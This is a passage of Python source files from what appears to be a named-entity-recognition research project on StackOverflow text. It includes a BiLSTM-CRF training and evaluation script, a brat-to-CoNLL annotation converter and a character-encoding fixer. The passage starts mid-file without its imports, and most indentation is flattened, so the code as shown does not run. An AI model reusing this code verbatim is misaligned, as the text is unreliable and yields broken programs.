from config_so import parameters
from config_so import opts
from utils_so import Sort_Entity_by_Count
import shutil
# from evaluate_so import evaluating
# sys.path.append('../../utility/')
import print_result
import conlleval_py
import tolatex
import time
from Word_Freqency_Mapper import Word_Freqency_Mapper
torch.backends.cudnn.deterministic = True
torch.manual_seed(parameters["seed"])
np.random.seed(parameters["seed"])
assert os.path.isfile(parameters["train"])
assert os.path.isfile(parameters["dev"])
assert os.path.isfile(parameters["test"])
assert parameters['char_dim'] > 0 or parameters['word_dim'] > 0
assert 0. <= parameters['dropout'] < 1.0
assert parameters['tag_scheme'] in ['iob', 'iobes']
assert not parameters['all_emb'] or parameters['pre_emb']
assert not parameters['pre_emb'] or parameters['word_dim'] > 0
# assert not parameters['pre_emb'] or os.path.isfile(parameters['pre_emb'])
def create_frequecny_vector():
# print("***********",parameters["freq_mapper_bin_count"], type(parameters["freq_mapper_bin_count"]))
    # Build the mapper with the configured bin count and width.
    freq_mapper = Word_Freqency_Mapper(bins=parameters["freq_mapper_bin_count"], w=parameters["freq_mapper_bin_width"])
freq_mapper.Find_Train_Data_Freq(parameters["train"])
freq_mapper.Read_Dev_Data(parameters["dev"])
freq_mapper.Read_Test_Data(parameters["test"])
freq_mapper.Find_Gaussian_Bining_For_Training_Data_Freq()
freq_mapper.Find_Freq_Vector_for_words()
freq_mapper.Write_Freq_To_File(parameters['freq_vector_file'])
def save_char_embed(sentence_words, char_embed_dict, char_embed_vectors):
# print(sentence_words)
# print(char_embed_dict)
# print(char_embed_vectors)
for sent_iter in range(len(sentence_words)):
word = sentence_words[sent_iter]
word_char_vector = char_embed_vectors[sent_iter]
char_embed_dict[word]=word_char_vector
# print(word, word_char_vector)
return char_embed_dict
def read_ctc_pred_file():
ctc_pred_dict = {}
for line in open(parameters["ctc_pred"]):
if line.strip()=="":
continue
line_values= line.strip().split("\t")
word, ctc_pred = line_values[0], line_values[-1]
# print(word, ctc_pred)
ctc_pred_dict[word]=ctc_pred
return ctc_pred_dict
def prepare_train_set_dev_data():
lower = parameters['lower']
zeros = parameters['zeros']
tag_scheme = parameters['tag_scheme']
#------------------------------------------------------------------
#------------- create the frequency vector-------------------------
#------------------------------------------------------------------
if parameters['use_freq_vector']:
create_frequecny_vector()
# print("completed frequency vector creation")
#------------------------------------------------------------------
#------------- create the ctc_dict-------------------------
#------------------------------------------------------------------
ctc_pred_dict = read_ctc_pred_file()
print("completed ctc predictions reading ")
#------------------------------------------------------------------
#------------- prepare the training data --------------------------
#------------- merge labels and select category specific entities -
#------------------------------------------------------------------
input_train_file=utils.Merge_Label(parameters["train"])
Sort_Entity_by_Count(input_train_file,parameters["sorted_entity_list_file_name"])
with open(parameters["sorted_entity_list_file_name"]) as f:
sorted_entity_list = json.load(f)
set_of_selected_tags=[]
entity_category_code=parameters["entity_category_code"]
entity_category_human_language=parameters["entity_category_human_language"]
set_of_selected_tags.extend(sorted_entity_list[0:-6])
if parameters['entity_category']=='code':
for entity in entity_category_human_language:
if entity in entity_category_human_language and entity in set_of_selected_tags:
set_of_selected_tags.remove(entity)
if parameters['entity_category']=='human_lang':
for entity in entity_category_code:
if entity in entity_category_code and entity in set_of_selected_tags:
set_of_selected_tags.remove(entity)
if 'Algorithm' not in set_of_selected_tags:
set_of_selected_tags.append('Algorithm')
if parameters['entity_category']=='all':
if 'Algorithm' not in set_of_selected_tags:
set_of_selected_tags.append('Algorithm')
print("set of entities: ", set_of_selected_tags)
merge_tags=parameters['merge_tags']
train_sentences = loader.load_sentences_so_w_pred(parameters["train"], parameters["train_pred"], lower, zeros,merge_tags, set_of_selected_tags)
if parameters["mode"]=="dev":
dev_sentences = loader.load_sentences_so_w_pred(parameters["dev"], parameters["dev_pred"],lower, zeros,merge_tags, set_of_selected_tags)
test_sentences = dev_sentences
elif parameters["mode"]=="test":
dev_sentences = loader.load_sentences_so_w_pred(parameters["test"], parameters["test_pred"],lower, zeros,merge_tags, set_of_selected_tags)
test_sentences = dev_sentences
# test_sentences = loader.load_sentences_so(parameters["test"], lower, zeros,merge_tags, set_of_selected_tags)
loader.update_tag_scheme(train_sentences, tag_scheme)
loader.update_tag_scheme(dev_sentences, tag_scheme)
loader.update_tag_scheme(test_sentences, tag_scheme)
dico_words_train = loader.word_mapping(train_sentences, lower)[0]
dico_chars, char_to_id, id_to_char = loader.char_mapping(train_sentences)
dico_tags, tag_to_id, id_to_tag = loader.tag_mapping(train_sentences)
# print(tag_to_id)
#------------------------------------------------------------------------------------------------------------
#------------- based on parameters setting(should be set by command line argutments) ------------------------
#------------- load pretrained word embeddings --------------------------------------------------------------
#------------------------------------------------------------------------------------------------------------
if parameters['all_emb']:
all_dev_test_words=[w[0][0] for w in dev_sentences+test_sentences]
else:
all_dev_test_words = []
if parameters['use_pre_emb']:
dico_words, word_to_id, id_to_word = loader.augment_with_pretrained(
dico_words_train.copy(),
parameters['pre_emb'],
all_dev_test_words
)
else:
dico_words = dico_words_train
word_to_id, id_to_word = loader.create_mapping(dico_words_train.copy())
train_data = loader.prepare_dataset(train_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
dev_data = loader.prepare_dataset(dev_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
test_data = loader.prepare_dataset(test_sentences, word_to_id, char_to_id, tag_to_id,ctc_pred_dict, lower)
all_freq_embed={}
for line in open(parameters['freq_vector_file']):
# print(line)
s = line.strip().split()
if len(s) == parameters['freq_dim'] + 1:
all_freq_embed[s[0]] = np.array([float(i) for i in s[1:]])
else:
print("freq dim mismatch: ","required: ", parameters['freq_dim'], "given: ",len(s)-1)
# print(all_freq_embed)
freq_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['freq_dim']))
for w in word_to_id:
if w in all_freq_embed:
freq_embeds[word_to_id[w]] = all_freq_embed[w]
elif w.lower() in all_freq_embed:
freq_embeds[word_to_id[w]] = all_freq_embed[w.lower()]
# print("done loading freq embeds")
all_word_embeds = {}
if parameters['use_pre_emb']:
for i, line in enumerate(codecs.open(parameters['pre_emb'] , 'r', 'utf-8')):
# print(line)
s = line.strip().split()
if len(s) == parameters['word_dim'] + 1:
all_word_embeds[s[0]] = np.array([float(i) for i in s[1:]])
word_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['word_dim']))
seg_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['segmentation_count'] , parameters['segmentation_dim']))
ctc_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['code_recognizer_count'], parameters['code_recognizer_dim']))
# code_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['code_pred_count'], parameters['code_pred_dim']))
if parameters['use_pre_emb']:
for w in word_to_id:
if w in all_word_embeds:
word_embeds[word_to_id[w]] = all_word_embeds[w]
elif w.lower() in all_word_embeds:
word_embeds[word_to_id[w]] = all_word_embeds[w.lower()]
# print('Loaded %i pretrained embeddings.' % len(all_word_embeds))
# print('Loaded %i pretrained freq embeddings.' % len(all_freq_embed))
# freq_combined_word_vec=np.hstack((word_embeds,freq_embeds))
# word_embeds=freq_combined_word_vec
# mapping_file = parameters["models_path"]+'/mapping.pkl'
# with open(mapping_file, 'wb') as f:
# mappings = {
# 'word_to_id': word_to_id,
# 'id_to_word': id_to_word,
# 'tag_to_id': tag_to_id,
# 'char_to_id': char_to_id,
# 'id_to_char': id_to_char,
# 'parameters': parameters,
# 'word_embeds': word_embeds,
# 'freq_embeds': freq_embeds,
# 'seg_pred_embeds': ctc_pred_embeds
# }
# pickle.dump(mappings, f, protocol=4)
return train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds
# vis = visdom.Visdom() #JT: no need of visualization for now
# sys.stdout.flush()
def evaluating(model, datas, best_F, epoch_count, phase_name):
fout_per_epoch = open(parameters["perf_per_epoch_file"],'a')
print("-----------------------------------")
print("now evaluating: ",phase_name)
print("-----------------------------------")
prediction = []
save = False
new_F = 0.0
confusion_matrix = torch.zeros((len(tag_to_id) - 2, len(tag_to_id) - 2))
iter_count=0
for data in datas:
ground_truth_id = data['tags']
words = data['str_words']
chars2 = data['chars']
caps = data['caps']
sentence_seg_preds = data['seg_pred']
sentence_ctc_preds = data['ctc_pred']
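        # Build the padded character matrix for this sentence. For the LSTM char encoder
        # the words are sorted by character length (longest first) and `d` maps sorted
        # positions back to the original word order so the char states can be realigned.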
if parameters['char_mode'] == 'LSTM':
chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
d = {}
for i, ci in enumerate(chars2):
for j, cj in enumerate(chars2_sorted):
if ci == cj and not j in d and not i in d.values():
d[j] = i
continue
chars2_length = [len(c) for c in chars2_sorted]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
for i, c in enumerate(chars2_sorted):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
if parameters['char_mode'] == 'CNN':
d = {}
chars2_length = [len(c) for c in chars2]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
for i, c in enumerate(chars2):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
dwords = Variable(torch.LongTensor(data['words']))
sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
dcaps = Variable(torch.LongTensor(caps))
if use_gpu:
val, out = model(words, dwords.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), chars2_mask.cuda(), dcaps.cuda(), chars2_length, d)
else:
val, out = model(words, dwords, sentence_seg_preds, sentence_ctc_preds, chars2_mask, dcaps, chars2_length, d)
predicted_id = out
for (word, true_id, pred_id) in zip(words, ground_truth_id, predicted_id):
line = ' '.join([word, id_to_tag[true_id], id_to_tag[pred_id]])
prediction.append(line)
confusion_matrix[true_id, pred_id] += 1
prediction.append('')
predf = parameters["eval_temp"] + '/pred.' + phase_name +"_"+str(epoch_count)
scoref = parameters["eval_temp"] + '/score.' + phase_name+"_"+str(epoch_count)
with open(predf, 'w') as f:
f.write('\n'.join(prediction))
eval_result = conlleval_py.evaluate_conll_file(inputFile=predf)
os.system('%s < %s > %s' % (eval_script, predf, scoref))
eval_lines = [l.rstrip() for l in codecs.open(scoref, 'r', 'utf8')]
for i, line in enumerate(eval_lines):
print(line)
if i == 1:
new_F = float(line.strip().split()[-1])
if new_F > best_F:
best_F = new_F
save = True
print('the best F is ', new_F)
#-------------------------------------------------------------------------------------------------
    #--------------- only print the performance on dev/test set. do not print for train set ----------
#-------------------------------------------------------------------------------------------------
if phase_name=="dev" or phase_name=="test":
print_result.print_result(eval_result, epoch_count, parameters["sorted_entity_list_file_name"], parameters["entity_category_code"], parameters["entity_category_human_language"])
print("-----------------------------------")
over_all_p=eval_result['overall']['P']
over_all_r=eval_result['overall']['R']
over_all_f1=eval_result['overall']['F1']
op_line = phase_name+ ": epoch: "+str(epoch_count) +" P: "+ str(over_all_p)+" R: "+str(over_all_r)+" F1: "+str(over_all_f1)+"\n"
fout_per_epoch.write(op_line)
fout_per_epoch.flush()
return best_F, new_F, save
def train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data):
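    # Training loop: for every epoch, visit the training sentences in random order,
    # minimize the CRF negative log-likelihood per sentence with gradient clipping,
    # then evaluate on train and dev/test once per epoch and checkpoint on improvement.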
char_embed_dict = {}
losses = []
loss = 0.0
best_dev_F = -1.0
best_test_F = -1.0
best_train_F = -1.0
all_F = [[0, 0, 0]]
plot_every = 10
eval_every = 20
count = 0
model.train(True)
start = time.time()
for epoch in range(1, parameters["epochs"]+1):
print("---------epoch count: ", epoch)
for i, index in enumerate(np.random.permutation(len(train_data))):
tr = time.time()
count += 1
data = train_data[index]
# print("from train_so: ",data)
#what is the data instance looks like"
#'str_words': ['Trial', 'and', 'error', 'seems', 'a', 'very', 'dumb', '(', 'and', 'annoying', ')', 'approach', 'to', 'solve', 'this', 'problem', '.'],
#'words': [1, 9, 76, 179, 7, 215, 1, 26, 9, 1, 29, 332, 4, 310, 15, 64, 3],
#'markdown': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
#'chars': [[26, 8, 5, 4, 10], [4, 6, 11], [1, 8, 8, 3, 8], [7, 1, 1, 14, 7], [4], [22, 1, 8, 17], [11, 13, 14, 21], [35], [4, 6, 11], [4, 6, 6, 3, 17, 5, 6, 16], [34], [4, 15, 15, 8, 3, 4, 12, 9], [2, 3], [7, 3, 10, 22, 1], [2, 9, 5, 7], [15, 8, 3, 21, 10, 1, 14], [20]],
#'caps': [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
#'tags': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'handcrafted': [28052, 28053, 28054, 28055, 28056, 28057, 28058, 28059, 28060, 28061, 28062, 28063, 28064, 28065, 28066, 28067, 28068]
model.zero_grad()
sentence_in = data['words']
sentence_tokens=data['str_words']
sentence_seg_preds = data['seg_pred']
sentence_ctc_preds = data['ctc_pred']
tags = data['tags']
chars2 = data['chars']
# print(data)
sentence_in = Variable(torch.LongTensor(sentence_in))
sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
######### char lstm
if parameters['char_mode'] == 'LSTM':
chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
d = {}
for i, ci in enumerate(chars2):
for j, cj in enumerate(chars2_sorted):
if ci == cj and not j in d and not i in d.values():
d[j] = i
continue
chars2_length = [len(c) for c in chars2_sorted]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
for i, c in enumerate(chars2_sorted):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
# ######## char cnn
if parameters['char_mode'] == 'CNN':
d = {}
chars2_length = [len(c) for c in chars2]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
for i, c in enumerate(chars2):
chars2_mask[i, :chars2_length[i]] = c
# print(chars2_mask)
chars2_mask = Variable(torch.LongTensor(chars2_mask))
targets = torch.LongTensor(tags)
caps = Variable(torch.LongTensor(data['caps']))
if use_gpu:
neg_log_likelihood = model.neg_log_likelihood(sentence_tokens, sentence_in.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), targets.cuda(), chars2_mask.cuda(), caps.cuda(), chars2_length, d)
else:
neg_log_likelihood = model.neg_log_likelihood(sentence_tokens,sentence_in,sentence_seg_preds,sentence_ctc_preds, targets, chars2_mask, caps, chars2_length, d)
# loss += neg_log_likelihood.data[0] / len(data['words'])
#JT : added the following to save char embed (for evaluating char embeds)
# if use_gpu:
# char_embed_op = model.get_char_embedding(sentence_in.cuda(), chars2_mask.cuda(), caps.cuda(), chars2_length, d).clone().data.cpu().numpy()
# else:
# char_embed_op = model.get_char_embedding(sentence_in, chars2_mask, caps, chars2_length, d).clone().data.cpu().numpy()
# char_embed_dict = save_char_embed( data['str_words'], char_embed_dict, char_embed_op)
# char_embed_dict_name= "char_embed_dict_"+str(epoch)+".json"
# with open(char_embed_dict_name, 'wb') as fp:
# pickle.dump(char_embed_dict, fp)
# print(char_embed_op)
loss += neg_log_likelihood.data.item() / len(data['words']) #JT : data[0]> data.item()
neg_log_likelihood.backward()
# torch.nn.utils.clip_grad_norm(model.parameters(), 5.0)
torch.nn.utils.clip_grad_norm_(model.parameters(), 5.0) #JT : clip_grad_norm > clip_grad_norm_
optimizer.step()
if count % len(train_data) == 0:
utils.adjust_learning_rate(optimizer, lr=learning_rate/(1+0.05*count/len(train_data)))
#JT: evaluate after 1 epoch
model.train(False)
best_train_F, new_train_F, _ = evaluating(model, train_data, best_train_F, epoch, "train")
if parameters["mode"]=="dev":
phase_name="dev"
else:
phase_name="test"
best_dev_F, new_dev_F, save = evaluating(model, dev_data, best_dev_F, epoch, phase_name)
if save:
torch.save(model, model_name)
best_test_F, new_test_F = 0, 0
all_F.append([new_train_F, new_dev_F, new_test_F])
step_lr_scheduler.step()
# word_embeding_weights=model.word_embeds.weight.data.cpu().numpy()
# print("type(word_embeding_weights): ", type(word_embeding_weights))
# print("shape word_embeding_weights: ", word_embeding_weights.shape)
# print("shape word_embeding_weights: ", model.word_embeds.weight.data.size())
# print("shape word_embeding_weights: ", model.word_embeds.weight.data[0])
#-------------------------------------------------------------------------------------------------
#--------------------- save model for each epoch, after finding the optimal epoch ----------------
#--------------------- save model from last epoch only -------------------------------------------
#-------------------------------------------------------------------------------------------------
PATH=parameters["models_path"]+"/model_epoch."+str(epoch)
torch.save(model, PATH)
model.train(True)
end = time.time()
time_in_this_epoch = end - start
print("time in this epoch: ", time_in_this_epoch, "secs")
start=end
return char_embed_dict
if __name__ == '__main__':
eval_script= parameters["eval_script"]
eval_temp= parameters["eval_temp"]
try:
shutil.rmtree(eval_temp)
except Exception as e:
pass
fout_per_epoch = open(parameters["perf_per_epoch_file"],'w')
fout_per_epoch.close()
if not os.path.isfile(eval_script):
raise Exception('CoNLL evaluation script not found at "%s"' % eval_script)
if not os.path.exists(eval_temp):
os.makedirs(eval_temp)
if not os.path.exists(parameters["models_path"]):
os.makedirs(parameters["models_path"])
train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds =prepare_train_set_dev_data()
use_gpu = parameters['use_gpu']
gpu_id = parameters["gpu_id"]
name = parameters['name']
model_name = parameters["models_path"] + name #get_name(parameters)
tmp_model = model_name + '.tmp'
model = BiLSTM_CRF(vocab_size=len(word_to_id),
tag_to_ix=tag_to_id,
embedding_dim=parameters['word_dim'],
freq_embed_dim=parameters['freq_dim'],
markdown_embed_dim=parameters['markdown_dim'],
seg_pred_embed_dim=parameters['segmentation_dim'],
hidden_dim=parameters['word_lstm_dim'],
use_gpu=use_gpu,
char_to_ix=char_to_id,
pre_word_embeds=word_embeds,
word_freq_embeds=freq_embeds,
word_seg_pred_embeds=seg_pred_embeds,
word_ctc_pred_embeds=ctc_pred_embeds,
use_crf=parameters['crf'],
char_mode=parameters['char_mode'],
# n_cap=4,
# cap_embedding_dim=10
)
if parameters['reload']:
model.load_state_dict(torch.load(model_name))
if use_gpu:
GPU_id=gpu_id
print("GPU ID = ", GPU_id)
torch.cuda.set_device(GPU_id)
model.cuda()
learning_rate = parameters["LR"]
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9)
step_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.8)
t = time.time()
train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data)
print("total time in training: ",time.time() - t)
try:
os.remove(parameters["sorted_entity_list_file_name"])
except Exception as e:
pass
```
#### File: BERT_NER/utils_preprocess/anntoconll.py
```python
from __future__ import print_function
import os
from glob import glob
import re
import sys
from collections import namedtuple
from io import StringIO
from os import path
import sys
from os.path import join as path_join
from os.path import dirname
from sys import path as sys_path
# assume script in brat tools/ directory, extend path to find sentencesplit.py
sys_path.append(path_join(dirname(__file__), '.'))
sys.path.append('.')
from sentencesplit import sentencebreaks_to_newlines
options = None
EMPTY_LINE_RE = re.compile(r'^\s*$')
CONLL_LINE_RE = re.compile(r'^\S+\t\d+\t\d+.')
import stokenizer #JT: Dec 6
import ark_twokenize #fallback tokenizer used when stokenizer times out
import ftfy #JT: Feb 20
from map_text_to_char import map_text_to_char #JT: Dec 6
def argparser():
import argparse
ap = argparse.ArgumentParser(description='Convert text and standoff ' +
'annotations into CoNLL format.')
ap.add_argument('-a', '--annsuffix', default=".ann",
help='Standoff annotation file suffix (default "ann")')
ap.add_argument('-c', '--singleclass', default=None,
help='Use given single class for annotations')
ap.add_argument('-n', '--nosplit', default=True, action='store_true',
help='No sentence splitting')
ap.add_argument('-o', '--outsuffix', default="conll",
help='Suffix to add to output files (default "conll")')
ap.add_argument('-v', '--verbose', default=False, action='store_true',
help='Verbose output')
# ap.add_argument('text', metavar='TEXT', nargs='+',
# help='Text files ("-" for STDIN)')
return ap
def read_sentence(f):
"""Return lines for one sentence from the CoNLL-formatted file.
Sentences are delimited by empty lines.
"""
lines = []
for l in f:
lines.append(l)
if EMPTY_LINE_RE.match(l):
break
if not CONLL_LINE_RE.search(l):
raise FormatError(
'Line not in CoNLL format: "%s"' %
l.rstrip('\n'))
return lines
def strip_labels(lines):
"""Given CoNLL-format lines, strip the label (first TAB-separated field)
from each non-empty line.
Return list of labels and list of lines without labels. Returned
list of labels contains None for each empty line in the input.
"""
labels, stripped = [], []
labels = []
for l in lines:
if EMPTY_LINE_RE.match(l):
labels.append(None)
stripped.append(l)
else:
fields = l.split('\t')
labels.append(fields[0])
stripped.append('\t'.join(fields[1:]))
return labels, stripped
def attach_labels(labels, lines):
"""Given a list of labels and CoNLL-format lines, affix TAB-separated label
to each non-empty line.
Returns list of lines with attached labels.
"""
assert len(labels) == len(
lines), "Number of labels (%d) does not match number of lines (%d)" % (len(labels), len(lines))
attached = []
for label, line in zip(labels, lines):
empty = EMPTY_LINE_RE.match(line)
assert (label is None and empty) or (label is not None and not empty)
if empty:
attached.append(line)
else:
attached.append('%s\t%s' % (label, line))
return attached
def text_to_conll(f):
"""Convert plain text into CoNLL format."""
global options
if options.nosplit:
sentences = f.readlines()
else:
sentences = []
for l in f:
l = sentencebreaks_to_newlines(l)
sentences.extend([s for s in NEWLINE_TERM_REGEX.split(l) if s])
lines = []
offset = 0
# print(sentences)
#JT: Feb 19: added it for resolving char encoding issues
fixed_sentences = []
for s in sentences:
# print(s)
# fixed_s = ftfy.fix_text(s)
# # print(fixed_s)
# fixed_sentences.append(fixed_s)
fixed_sentences.append(s)
# for s in sentences:
for s in fixed_sentences:
nonspace_token_seen = False
# print(s)
try:
tokens = stokenizer.tokenize(s)
except stokenizer.TimedOutExc as e:
try:
print("***********using ark tokenizer")
tokens = ark_twokenize.tokenizeRawTweetText(s)
except Exception as e:
print(e)
# print("tokens: ", tokens)
token_w_pos = map_text_to_char(s, tokens, offset)
# print("token_w_pos: ",token_w_pos)
for(t, pos) in token_w_pos:
if not t.isspace():
lines.append(['O', pos, pos + len(t), t])
lines.append([])
offset+=len(s)
# tokens = [t for t in TOKENIZATION_REGEX.split(s) if t] # JT : Dec 6
# for t in tokens:
# if not t.isspace():
# lines.append(['O', offset, offset + len(t), t])
# nonspace_token_seen = True
# offset += len(t)
# # sentences delimited by empty lines
# if nonspace_token_seen:
# lines.append([])
# add labels (other than 'O') from standoff annotation if specified
if options.annsuffix:
lines = relabel(lines, get_annotations(f.name), f)
# lines = [[l[0], str(l[1]), str(l[2]), l[3]] if l else l for l in lines] #JT: Dec 6
lines = [[l[3],l[0]] if l else l for l in lines] #JT: Dec 6
return StringIO('\n'.join(('\t'.join(l) for l in lines)))
def relabel(lines, annotations, file_name):
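    # Assign B-/I- tags: for every token, check whether any of its character offsets
    # fall inside an annotated textbound; the first token of a span becomes B-<type>
    # and the following tokens of the same span become I-<type>.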
# print("lines: ",lines)
# print("annotations", annotations)
global options
# TODO: this could be done more neatly/efficiently
offset_label = {}
for tb in annotations:
for i in range(tb.start, tb.end):
if i in offset_label:
print("Warning: overlapping annotations in ", file=sys.stderr)
offset_label[i] = tb
prev_label = None
for i, l in enumerate(lines):
if not l:
prev_label = None
continue
tag, start, end, token = l
# TODO: warn for multiple, detailed info for non-initial
label = None
for o in range(start, end):
if o in offset_label:
if o != start:
print('Warning: annotation-token boundary mismatch: "%s" --- "%s"' % (
token, offset_label[o].text), file=sys.stderr)
label = offset_label[o].type
break
if label is not None:
if label == prev_label:
tag = 'I-' + label
else:
tag = 'B-' + label
prev_label = label
lines[i] = [tag, start, end, token]
# optional single-classing
if options.singleclass:
for l in lines:
if l and l[0] != 'O':
l[0] = l[0][:2] + options.singleclass
return lines
def process_files(files, output_directory, phase_name=""):
global options
# print("phase_name: ",phase_name)
nersuite_proc = []
for fn in sorted(files):
# print("now_processing: ",fn)
        with open(fn, 'r') as f:
try:
lines = text_to_conll(f)
except:
continue
# TODO: better error handling
if lines is None:
print("Line is None")
continue
file_name=fn.split("/")[-1][0:-4]
ofn = output_directory+file_name+"_" +options.outsuffix.replace(".","")+"_"+phase_name.replace("/","")+".txt"
with open(ofn, 'wt') as of:
of.write(''.join(lines))
TEXTBOUND_LINE_RE = re.compile(r'^T\d+\t')
Textbound = namedtuple('Textbound', 'start end type text')
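# A brat standoff textbound line is tab-separated, for example:
#   T1<TAB>Library 10 17<TAB>pandas
# i.e. an id, then "<type> <start-offset> <end-offset>", then the covered text
# (the entity type and text above are illustrative, not from the corpus).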
def parse_textbounds(f):
"""Parse textbound annotations in input, returning a list of Textbound."""
textbounds = []
for l in f:
l = l.rstrip('\n')
if not TEXTBOUND_LINE_RE.search(l):
continue
id_, type_offsets, text = l.split('\t')
type_, start, end = type_offsets.split()
start, end = int(start), int(end)
textbounds.append(Textbound(start, end, type_, text))
return textbounds
def eliminate_overlaps(textbounds):
eliminate = {}
# TODO: avoid O(n^2) overlap check
for t1 in textbounds:
for t2 in textbounds:
if t1 is t2:
continue
if t2.start >= t1.end or t2.end <= t1.start:
continue
# eliminate shorter
if t1.end - t1.start > t2.end - t2.start:
print("Eliminate %s due to overlap with %s" % (
t2, t1), file=sys.stderr)
eliminate[t2] = True
else:
print("Eliminate %s due to overlap with %s" % (
t1, t2), file=sys.stderr)
eliminate[t1] = True
return [t for t in textbounds if t not in eliminate]
def get_annotations(fn):
global options
annfn = path.splitext(fn)[0] + options.annsuffix
    with open(annfn, 'r') as f:
textbounds = parse_textbounds(f)
textbounds = eliminate_overlaps(textbounds)
return textbounds
def Read_Main_Input_Folder(input_folder):
start_dir = input_folder
pattern = "*.txt"
file_location_list=[]
for dir,_,_ in os.walk(start_dir):
file_location_list.extend(glob(os.path.join(dir,pattern)))
return file_location_list
def process_folder(source_folder, output_dir_ann, min_folder_number = 1, max_folder_number=10 ):
# for i in range(min_folder_number,max_folder_number+1):
# for j in range(1,6):
# phase_name="phase_"+str(i).zfill(2) + "_"+str(j).zfill(2)+"/"
input_folder=source_folder
print(input_folder)
list_of_files=Read_Main_Input_Folder(input_folder)
process_files(list_of_files, output_dir_ann)
def convert_standoff_to_conll(source_directory_ann, output_directory_conll):
global options
argv = sys.argv
options = argparser().parse_args(argv[1:])
# print(options)
# sorce_folder = "checked_annotation/"
# phase_name="phase_02_05/"
# input_folder=sorce_folder+phase_name
# list_of_files=Read_Main_Input_Folder(input_folder)
# output_dir_ann = "Conlll_Output_ANN/"
# process_files(list_of_files, output_dir_ann, phase_name)
process_folder(source_directory_ann, output_directory_conll)
# sorce_folder = "raw_data/"
# output_dir_raw = "Conlll_Output_RAW/"
# sorce_folder = "raw_data/"
# phase_name="phase_02_05/"
# input_folder=sorce_folder+phase_name
# list_of_files=Read_Main_Input_Folder(input_folder)
# output_dir_ann = "Conlll_Output_RAW/"
# process_files(list_of_files, output_dir_ann, phase_name)
if __name__ == '__main__':
source_directory_ann = "../temp_files/standoff_files/"
output_directory_conll = "../temp_files/conll_files/"
convert_standoff_to_conll(source_directory_ann, output_directory_conll)
```
#### File: BERT_NER/utils_preprocess/fix_char_encoding.py
```python
import ftfy
import stokenizer
import ark_twokenize
class Fix_Char_Code:
"""docstring for Fix_Char_Code"""
def __init__(self):
pass
def Get_List_of_Labels(self, tokenized_word_list_len, main_label):
if main_label=="O":
new_label="O"
elif main_label[0]=="B":
new_label=main_label.replace("B-","I-")
else:
new_label= main_label
new_label_list=[main_label]
for i in range(tokenized_word_list_len-1):
new_label_list.append(new_label)
# print(tokenized_word_list_len, main_label, new_label_list)
return new_label_list
def Fix_Word_Label(self, word, gold_label, raw_label):
if "&zwnj" in word or " " in word or "&" in word:
return ([word], [gold_label], [raw_label], False)
fixed_word = ftfy.fix_text(word)
#the following line is found from error analysis over the fixed encoding by finding && in the text file
fixed_word=fixed_word.replace("´","'").replace("ÂŁ","£").replace('Ăż','ÿ').replace('Âż','¿').replace('ÂŹ','¬').replace('รก','á').replace("â","†").replace("`ĚN","`̀N")
modified=True
if fixed_word==word:
modified = False
return ([fixed_word], [gold_label], [raw_label], modified)
try:
fixed_word_tokenized= stokenizer.tokenize(fixed_word)
except stokenizer.TimedOutExc as e:
try:
fixed_word_tokenized= ark_twokenize.tokenizeRawTweetText(fixed_word)
except Exception as e:
print(e)
if len(fixed_word_tokenized)==2 and fixed_word_tokenized[0]=="'":
return ([fixed_word], [gold_label], [raw_label],modified)
# print(word, fixed_word, fixed_word_tokenized)
new_gold_label_list = self.Get_List_of_Labels(len(fixed_word_tokenized), gold_label)
new_raw_label_list = self.Get_List_of_Labels(len(fixed_word_tokenized), raw_label)
return (fixed_word_tokenized, new_gold_label_list, new_raw_label_list,modified)
def Read_File(self, ip_file):
output_file_name = ip_file[:-4]+"_char_embed_resolved.txt"
fout= open(output_file_name,'w')
for line in open(ip_file):
if line.strip()=="":
fout.write(line)
continue
line_values=line.strip().split()
gold_word=line_values[0]
gold_label=line_values[1]
raw_word=line_values[2]
raw_label=line_values[3]
(new_tokenized_word_list, new_gold_label_list, new_raw_label_list, if_modified) = self.Fix_Word_Label(gold_word, gold_label, raw_label)
if if_modified:
print(line.strip())
print(new_tokenized_word_list)
print("----")
